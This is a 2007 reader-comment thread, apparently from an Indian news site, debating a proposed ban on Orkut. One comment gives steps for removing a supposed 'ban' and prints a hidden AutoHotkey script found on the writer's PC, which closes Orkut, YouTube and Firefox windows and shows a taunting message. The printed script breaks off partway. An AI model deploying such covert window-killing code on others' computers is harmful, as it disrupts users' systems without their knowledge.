Total 976 messages Pages < Newer  | 1 | 2 | 3 | 4 | 5   Older >   >>
Crazy ideas..
by best solutions on Jul 13, 2007 01:45 PM  Permalink 

this is really crazy. i have a question to people who are against orkut. can you change people's mentality? as far as i understand you cant. then what is the point of banning orkut. its just a friendly platform where people come and chat, share ideas etc. why dnt they do something for our roads, drainage, living standards etc.. which we all face everyday on indian roads, have you seen the work culture in any municipality offices? whch is more imp to be addressed. hw does stopping orkut makes sense when people carry opinions in their mind, which cant be banned !

Do you think Orkut should be banned? Does such a ban mean suppression of freedom? Or is the ban justified?
by sreeja biju on Jul 13, 2007 01:34 PM  Permalink 

yes... because orkut is not serving as a social community group.
It works as a non secure non privacy group
any body can tolerate privacy of any user
and misused that details

Ban... Try banning my thoughts...
by Tanvir on Jul 12, 2007 03:58 PM  Permalink 

The so called "Democracy"
Freedom of speech, expression...blah blah.
If u have to ban something "BAN SHIV SENA" they have no right to do whatsoever they are doing. They are the real terrorists who live on political gunda raj and do whatever they feel suits their ends. They can beat you, they can ban theings, they can trash shops, they can trash cafes.... I don't see orkut doing this... SO tell me ppl should orkut or shiv sena be banned.....???? Im waiting for your replies...!

orkut
by Rawal on Jul 09, 2007 10:17 AM  Permalink 

Perhaps it has become the greatest form of communication b/w the friends who cannot meet each other ..
it is one of most inovative idea on the net.after my collge i m still in touch with friends b'coz of orkut and if it all happened then people like me would b the sufferer.

orkut
by JOTISH NAIR on Jul 08, 2007 05:13 PM  Permalink 

a few days ago orkut was banned in the UAE..perhaps due to hate community sites or the x rated pics and profiles! unfortunately people like me are suffering!

orkut not banned ....... it is virus
by ravikumar natikar on Jul 06, 2007 03:34 PM  Permalink 

HI Friends,

when I came home. MY system was ON , Never Notice that before since i
had given a Command to shut down @ 10:30 in the Morning.. ok.. ok
Lemme tell you how remove tat Bug(here Malware)

when you get that Message.
1. Go to the Task manager
2. click on the "Application" Tab ( if its not )
3. Right Click on the application that's Giving you the Messge > go
the Process.
4 as you can see there is "svchost.exe" Highlighted.
5. Right Click and Select "End Process Tree"

well this is for the Begginers. :)

if you really wanna get rid of the malware.

here is the deal..

there is a File called
"heap41a"

which is located in C:heap41a.

This is the Script which i got it when i checked the file.

#persistent
#notrayicon
settimer,ban,2000
return

ban:
WinGetActiveTitle, ed
ifinstring,ed,orkut
{
winclose %ed%
soundplay,C:heap41a2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ifinstring,ed,youtube
{
winclose %ed%
soundplay,C:heap41a2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ifinstring,ed,Mozilla Firefox
{
winclose %ed%

Banning of orkut means banning of freedom
by arvind srivastava on Jul 04, 2007 06:00 PM  Permalink 

Why in a country where all cast and creed are given a same status is behaving like this , I think that banning a orkut means banning of freedom of our rights its just a site of networking yes proper monitoring is required but banning is not a solution.
Arvind

It some some modifications
by smita goswami on Jul 04, 2007 03:48 PM  Permalink  | Hide replies

Orkut is a big platform where people from all over the world meets online. There are some good and bad sides of this. The problem will not be solved just by banning it. The user of ORKUT should be aware of the harmfulness of this. And they should try to keep as less personel information as they can. And in some profiles we can see some nude pictures. These should be banned. Because, its not a sex discussion board, but a social - friendly platform.

RE:It some some modifications
by atul dwivedi on Jul 09, 2007 06:43 PM  Permalink
i think u r right but u know in our country there is a ban on dourry but u can see.so u should think that "bas ek hi ullu kaphi hai barbad gulistan karne ko har sakh pe ullu baitha hai anjam gulista kya hoga"
now u think
atul dwivedi

It Should not be banned at all!!
by ghoshdibyajyoti_sit2004@rediffmail.com on Jul 04, 2007 09:15 AM  Permalink 

Orkut is a good place to keep connection among friends...and so it is no way harmful...rather I support this kind of forum very much. and hence it should not be banned

It should be BANNED and destroyed
by Roshan Dsouza on Jun 30, 2007 03:08 PM  Permalink 

It destroyed my marriage, it gave an avenue to simple housewives a pleasure to devulge their intimate details and in the progress it destroyed the fabric of marital trust.

The discord it caused, let to adultery and eventual divorce. DOnt let my story be repeated in someone else's life.

Total 976 messages Pages: < Newer  | 1 | 2 | 3 | 4 | 5   Older >   >>